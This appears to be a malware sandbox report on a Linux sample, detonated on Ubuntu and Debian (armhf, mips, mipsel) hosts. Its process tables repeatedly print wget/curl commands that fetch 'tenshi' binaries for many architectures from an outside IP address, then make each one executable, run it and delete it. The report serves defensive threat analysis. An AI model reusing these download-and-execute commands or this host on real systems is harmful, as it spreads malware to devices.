Analysis Overview
SHA256
61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b
Threat Level: Shows suspicious behavior
The file 296a3c4f0b173217c609be610594274f.bin shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-08 02:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:06
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
2s
Max time network
132s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
| N/A | /tmp/tenshii586 | /tmp/tenshii586 | N/A |
| N/A | /tmp/tenshim68k | /tmp/tenshim68k | N/A |
| N/A | /tmp/tenshish | /tmp/tenshish | N/A |
| N/A | /tmp/tenshifuck | /tmp/tenshifuck | N/A |
| N/A | /tmp/tenshiapache2 | /tmp/tenshiapache2 | N/A |
| N/A | /tmp/tenshitelnetd | /tmp/tenshitelnetd | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/tenshish | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshitelnetd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshim68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshifuck | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiapache2 | /usr/bin/curl | N/A |
Processes
| Process | Command Line |
|---|---|
| /tmp/296a3c4f0b173217c609be610594274f.bin | /tmp/296a3c4f0b173217c609be610594274f.bin |
| /usr/bin/wget | wget http://157.230.117.251/tenshimips |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimips |
| /bin/chmod | chmod +x tenshimips |
| /tmp/tenshimips | ./tenshimips |
| /bin/rm | rm -rf tenshimips |
| /usr/bin/wget | wget http://157.230.117.251/tenshimipsel |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimipsel |
| /bin/chmod | chmod +x tenshimipsel |
| /tmp/tenshimipsel | ./tenshimipsel |
| /bin/rm | rm -rf tenshimipsel |
| /usr/bin/wget | wget http://157.230.117.251/tenshish4 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshish4 |
| /bin/chmod | chmod +x tenshish4 |
| /tmp/tenshish4 | ./tenshish4 |
| /bin/rm | rm -rf tenshish4 |
| /usr/bin/wget | wget http://157.230.117.251/tenshix86 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshix86 |
| /bin/chmod | chmod +x tenshix86 |
| /tmp/tenshix86 | ./tenshix86 |
| /bin/rm | rm -rf tenshix86 |
| /usr/bin/wget | wget http://157.230.117.251/tenshiarm6 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshiarm6 |
| /bin/chmod | chmod +x tenshiarm6 |
| /tmp/tenshiarm6 | ./tenshiarm6 |
| /bin/rm | rm -rf tenshiarm6 |
| /usr/bin/wget | wget http://157.230.117.251/tenshii686 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshii686 |
| /bin/chmod | chmod +x tenshii686 |
| /tmp/tenshii686 | ./tenshii686 |
| /bin/rm | rm -rf tenshii686 |
| /usr/bin/wget | wget http://157.230.117.251/tenshippc |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshippc |
| /bin/chmod | chmod +x tenshippc |
| /tmp/tenshippc | ./tenshippc |
| /bin/rm | rm -rf tenshippc |
| /usr/bin/wget | wget http://157.230.117.251/tenshii586 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshii586 |
| /bin/chmod | chmod +x tenshii586 |
| /tmp/tenshii586 | ./tenshii586 |
| /bin/rm | rm -rf tenshii586 |
| /usr/bin/wget | wget http://157.230.117.251/tenshim68k |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshim68k |
| /bin/chmod | chmod +x tenshim68k |
| /tmp/tenshim68k | ./tenshim68k |
| /bin/rm | rm -rf tenshim68k |
| /usr/bin/wget | wget http://157.230.117.251/tenshish |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshish |
| /bin/chmod | chmod +x tenshish |
| /tmp/tenshish | ./tenshish |
| /bin/rm | rm -rf tenshish |
| /usr/bin/wget | wget http://157.230.117.251/tenshifuck |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshifuck |
| /bin/chmod | chmod +x tenshifuck |
| /tmp/tenshifuck | ./tenshifuck |
| /bin/rm | rm -rf tenshifuck |
| /usr/bin/wget | wget http://157.230.117.251/tenshiapache2 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshiapache2 |
| /bin/chmod | chmod +x tenshiapache2 |
| /tmp/tenshiapache2 | ./tenshiapache2 |
| /bin/rm | rm -rf tenshiapache2 |
| /usr/bin/wget | wget http://157.230.117.251/tenshitelnetd |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshitelnetd |
| /bin/chmod | chmod +x tenshitelnetd |
| /tmp/tenshitelnetd | ./tenshitelnetd |
| /bin/rm | rm -rf tenshitelnetd |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 151.101.193.91:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.3:443 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
Files
/tmp/tenshimips
| Algorithm | Value |
|---|---|
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:07
Platform
debian9-armhf-20240611-en
Max time kernel
11s
Max time network
14s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
Processes
| Process | Command Line |
|---|---|
| /tmp/296a3c4f0b173217c609be610594274f.bin | /tmp/296a3c4f0b173217c609be610594274f.bin |
| /usr/bin/wget | wget http://157.230.117.251/tenshimips |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimips |
| /bin/chmod | chmod +x tenshimips |
| /tmp/tenshimips | ./tenshimips |
| /bin/rm | rm -rf tenshimips |
| /usr/bin/wget | wget http://157.230.117.251/tenshimipsel |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimipsel |
| /bin/chmod | chmod +x tenshimipsel |
| /tmp/tenshimipsel | ./tenshimipsel |
| /bin/rm | rm -rf tenshimipsel |
| /usr/bin/wget | wget http://157.230.117.251/tenshish4 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshish4 |
| /bin/chmod | chmod +x tenshish4 |
| /tmp/tenshish4 | ./tenshish4 |
| /bin/rm | rm -rf tenshish4 |
| /usr/bin/wget | wget http://157.230.117.251/tenshix86 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshix86 |
| /bin/chmod | chmod +x tenshix86 |
| /tmp/tenshix86 | ./tenshix86 |
| /bin/rm | rm -rf tenshix86 |
| /usr/bin/wget | wget http://157.230.117.251/tenshiarm6 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshiarm6 |
| /bin/chmod | chmod +x tenshiarm6 |
| /tmp/tenshiarm6 | ./tenshiarm6 |
| /bin/rm | rm -rf tenshiarm6 |
| /usr/bin/wget | wget http://157.230.117.251/tenshii686 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshii686 |
| /bin/chmod | chmod +x tenshii686 |
| /tmp/tenshii686 | ./tenshii686 |
| /bin/rm | rm -rf tenshii686 |
| /usr/bin/wget | wget http://157.230.117.251/tenshippc |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshippc |
| /bin/chmod | chmod +x tenshippc |
| /tmp/tenshippc | ./tenshippc |
| /bin/rm | rm -rf tenshippc |
| /usr/bin/wget | wget http://157.230.117.251/tenshii586 |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
Files
/tmp/tenshimips
| Algorithm | Value |
|---|---|
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:07
Platform
debian9-mipsbe-20240611-en
Max time kernel
123s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
| N/A | /tmp/tenshii586 | /tmp/tenshii586 | N/A |
| N/A | /tmp/tenshim68k | /tmp/tenshim68k | N/A |
| N/A | /tmp/tenshish | /tmp/tenshish | N/A |
| N/A | /tmp/tenshifuck | /tmp/tenshifuck | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshifuck | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshim68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
Processes
| Process | Command Line |
|---|---|
| /tmp/296a3c4f0b173217c609be610594274f.bin | /tmp/296a3c4f0b173217c609be610594274f.bin |
| /usr/bin/wget | wget http://157.230.117.251/tenshimips |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimips |
| /bin/chmod | chmod +x tenshimips |
| /tmp/tenshimips | ./tenshimips |
| /bin/rm | rm -rf tenshimips |
| /usr/bin/wget | wget http://157.230.117.251/tenshimipsel |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimipsel |
| /bin/chmod | chmod +x tenshimipsel |
| /tmp/tenshimipsel | ./tenshimipsel |
| /bin/rm | rm -rf tenshimipsel |
| /usr/bin/wget | wget http://157.230.117.251/tenshish4 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshish4 |
| /bin/chmod | chmod +x tenshish4 |
| /tmp/tenshish4 | ./tenshish4 |
| /bin/rm | rm -rf tenshish4 |
| /usr/bin/wget | wget http://157.230.117.251/tenshix86 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshix86 |
| /bin/chmod | chmod +x tenshix86 |
| /tmp/tenshix86 | ./tenshix86 |
| /bin/rm | rm -rf tenshix86 |
| /usr/bin/wget | wget http://157.230.117.251/tenshiarm6 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshiarm6 |
| /bin/chmod | chmod +x tenshiarm6 |
| /tmp/tenshiarm6 | ./tenshiarm6 |
| /bin/rm | rm -rf tenshiarm6 |
| /usr/bin/wget | wget http://157.230.117.251/tenshii686 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshii686 |
| /bin/chmod | chmod +x tenshii686 |
| /tmp/tenshii686 | ./tenshii686 |
| /bin/rm | rm -rf tenshii686 |
| /usr/bin/wget | wget http://157.230.117.251/tenshippc |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshippc |
| /bin/chmod | chmod +x tenshippc |
| /tmp/tenshippc | ./tenshippc |
| /bin/rm | rm -rf tenshippc |
| /usr/bin/wget | wget http://157.230.117.251/tenshii586 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshii586 |
| /bin/chmod | chmod +x tenshii586 |
| /tmp/tenshii586 | ./tenshii586 |
| /bin/rm | rm -rf tenshii586 |
| /usr/bin/wget | wget http://157.230.117.251/tenshim68k |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshim68k |
| /bin/chmod | chmod +x tenshim68k |
| /tmp/tenshim68k | ./tenshim68k |
| /bin/rm | rm -rf tenshim68k |
| /usr/bin/wget | wget http://157.230.117.251/tenshish |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshish |
| /bin/chmod | chmod +x tenshish |
| /tmp/tenshish | ./tenshish |
| /bin/rm | rm -rf tenshish |
| /usr/bin/wget | wget http://157.230.117.251/tenshifuck |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshifuck |
| /bin/chmod | chmod +x tenshifuck |
| /tmp/tenshifuck | ./tenshifuck |
| /bin/rm | rm -rf tenshifuck |
| /usr/bin/wget | wget http://157.230.117.251/tenshiapache2 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshiapache2 |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | | tcp |
Files
/tmp/tenshimips
| Algorithm | Value |
|---|---|
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:08
Platform
debian9-mipsel-20240226-en
Max time kernel
111s
Max time network
117s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
| N/A | /tmp/tenshii586 | /tmp/tenshii586 | N/A |
| N/A | /tmp/tenshim68k | /tmp/tenshim68k | N/A |
| N/A | /tmp/tenshish | /tmp/tenshish | N/A |
| N/A | /tmp/tenshifuck | /tmp/tenshifuck | N/A |
| N/A | /tmp/tenshiapache2 | /tmp/tenshiapache2 | N/A |
| N/A | /tmp/tenshitelnetd | /tmp/tenshitelnetd | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshim68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshifuck | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshitelnetd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiapache2 | /usr/bin/curl | N/A |
Processes
| Process | Command Line |
|---|---|
| /tmp/296a3c4f0b173217c609be610594274f.bin | /tmp/296a3c4f0b173217c609be610594274f.bin |
| /usr/bin/wget | wget http://157.230.117.251/tenshimips |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimips |
| /bin/chmod | chmod +x tenshimips |
| /tmp/tenshimips | ./tenshimips |
| /bin/rm | rm -rf tenshimips |
| /usr/bin/wget | wget http://157.230.117.251/tenshimipsel |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshimipsel |
| /bin/chmod | chmod +x tenshimipsel |
| /tmp/tenshimipsel | ./tenshimipsel |
| /bin/rm | rm -rf tenshimipsel |
| /usr/bin/wget | wget http://157.230.117.251/tenshish4 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshish4 |
| /bin/chmod | chmod +x tenshish4 |
| /tmp/tenshish4 | ./tenshish4 |
| /bin/rm | rm -rf tenshish4 |
| /usr/bin/wget | wget http://157.230.117.251/tenshix86 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshix86 |
| /bin/chmod | chmod +x tenshix86 |
| /tmp/tenshix86 | ./tenshix86 |
| /bin/rm | rm -rf tenshix86 |
| /usr/bin/wget | wget http://157.230.117.251/tenshiarm6 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshiarm6 |
| /bin/chmod | chmod +x tenshiarm6 |
| /tmp/tenshiarm6 | ./tenshiarm6 |
| /bin/rm | rm -rf tenshiarm6 |
| /usr/bin/wget | wget http://157.230.117.251/tenshii686 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshii686 |
| /bin/chmod | chmod +x tenshii686 |
| /tmp/tenshii686 | ./tenshii686 |
| /bin/rm | rm -rf tenshii686 |
| /usr/bin/wget | wget http://157.230.117.251/tenshippc |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshippc |
| /bin/chmod | chmod +x tenshippc |
| /tmp/tenshippc | ./tenshippc |
| /bin/rm | rm -rf tenshippc |
| /usr/bin/wget | wget http://157.230.117.251/tenshii586 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshii586 |
| /bin/chmod | chmod +x tenshii586 |
| /tmp/tenshii586 | ./tenshii586 |
| /bin/rm | rm -rf tenshii586 |
| /usr/bin/wget | wget http://157.230.117.251/tenshim68k |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshim68k |
| /bin/chmod | chmod +x tenshim68k |
| /tmp/tenshim68k | ./tenshim68k |
| /bin/rm | rm -rf tenshim68k |
| /usr/bin/wget | wget http://157.230.117.251/tenshish |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshish |
| /bin/chmod | chmod +x tenshish |
| /tmp/tenshish | ./tenshish |
| /bin/rm | rm -rf tenshish |
| /usr/bin/wget | wget http://157.230.117.251/tenshifuck |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshifuck |
| /bin/chmod | chmod +x tenshifuck |
| /tmp/tenshifuck | ./tenshifuck |
| /bin/rm | rm -rf tenshifuck |
| /usr/bin/wget | wget http://157.230.117.251/tenshiapache2 |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshiapache2 |
| /bin/chmod | chmod +x tenshiapache2 |
| /tmp/tenshiapache2 | ./tenshiapache2 |
| /bin/rm | rm -rf tenshiapache2 |
| /usr/bin/wget | wget http://157.230.117.251/tenshitelnetd |
| /usr/bin/curl | curl -O http://157.230.117.251/tenshitelnetd |
| /bin/chmod | chmod +x tenshitelnetd |
| /tmp/tenshitelnetd | ./tenshitelnetd |
| /bin/rm | rm -rf tenshitelnetd |
Network
